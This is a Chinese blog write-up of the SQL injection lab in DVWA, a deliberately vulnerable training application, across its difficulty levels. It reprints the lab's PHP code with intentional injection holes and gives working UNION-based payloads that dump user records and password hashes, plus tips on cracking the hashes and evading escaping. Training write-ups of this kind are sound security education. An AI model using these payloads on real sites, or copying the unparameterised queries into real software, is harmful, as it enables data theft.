zoukankan      html  css  js  c++  java
  • DVWA靶场之SQL Injection通关

    SQL注入,一个大概的手工流程:

    1. 判断是否有注入,什么类型
    2. 破解SQL语句中查询的字段数是多少
    3. 确定回显位置
    4. 破库
    5. 破表
    6. 破字段
    7. 获得内容

    Low

    <?php

    if( isset( $_REQUEST[ 'Submit' ] ) ) {

        // Get input

        $id = $_REQUEST[ 'id' ];

        // Check database

        $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Get results

        while( $row = mysqli_fetch_assoc( $result ) ) {

            // Get values

            $first = $row["first_name"];

            $last  = $row["last_name"];

            // Feedback for end user

            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        }

        mysqli_close($GLOBALS["___mysqli_ston"]);

    }

    ?>

    没有任何过滤就带入查询

    手工注入测试,标准流程化操作

    输入1,成功并返回结果

    输入1' 报错,提示得知是字符型注入

    1' order by 16# 测试,报错,减半再试,直到1' order by 2 #不报错,字段数2

    1' union select 1,2 # 回显两个点

    1' union select 1,database() # 查库

    1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # 查表

    1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' # 查字段

    1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users # 查数据

    www.cmd5.com破解一下密码

    Medium

    <?php

    if( isset( $_POST[ 'Submit' ] ) ) {

        // Get input

        $id = $_POST[ 'id' ];

        $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

        $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";

        $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

        // Get results

        while( $row = mysqli_fetch_assoc( $result ) ) {

            // Display values

            $first = $row["first_name"];

            $last  = $row["last_name"];

            // Feedback for end user

            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        }

    }

    // This is used later on in the index.php page

    // Setting it here so we can close the database connection in here like in the rest of the source scripts

    $query  = "SELECT COUNT(*) FROM users;";

    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    $number_of_rows = mysqli_fetch_row( $result )[0];

    mysqli_close($GLOBALS["___mysqli_ston"]);

    ?>

    界面变成了下拉表单,还有mysqli_real_escape_string转义

     

    用burp suite抓包改包,改id的值即可,与low级别思想一样的,一套连招

    有一个区别,由于有了转义,low级别用的’users’这种带引号的必不可能用了,可以将users ASCII hex编码一波0x7573657273

    High

    界面又变了

    <?php

    if( isset( $_SESSION [ 'id' ] ) ) {

        // Get input

        $id = $_SESSION[ 'id' ];

        // Check database

        $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";

        $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

        // Get results

        while( $row = mysqli_fetch_assoc( $result ) ) {

            // Get values

            $first = $row["first_name"];

            $last  = $row["last_name"];

            // Feedback for end user

            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        }

        ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);       

    }

    ?>

    LIMIT 1限制了输出只有1个结果,可注释掉

    思路和前面一致

    1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

    另:经提醒,两个界面分离,可干扰sqlmap注入

    Impossible

    <?php

    if( isset( $_GET[ 'Submit' ] ) ) {

        // Check Anti-CSRF token

        checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

        // Get input

        $id = $_GET[ 'id' ];

        // Was a number entered?

        if(is_numeric( $id )) {

            // Check the database

            $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );

            $data->bindParam( ':id', $id, PDO::PARAM_INT );

            $data->execute();

            $row = $data->fetch();

            // Make sure only 1 result is returned

            if( $data->rowCount() == 1 ) {

                // Get values

                $first = $row[ 'first_name' ];

                $last  = $row[ 'last_name' ];

                // Feedback for end user

                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

            }

        }

    }

    // Generate Anti-CSRF token

    generateSessionToken();

    ?>

    PDO还是很有用的

  • 相关阅读:
    Uva11988
    Uva140
    子集生成
    Uva129
    Uva524
    Uva10976
    Uva11059
    Uva725
    HDU4268(贪心+multiset)
    HDU2034(set水题)
  • 原文地址:https://www.cnblogs.com/lcxblogs/p/13281579.html
Copyright © 2011-2022 走看看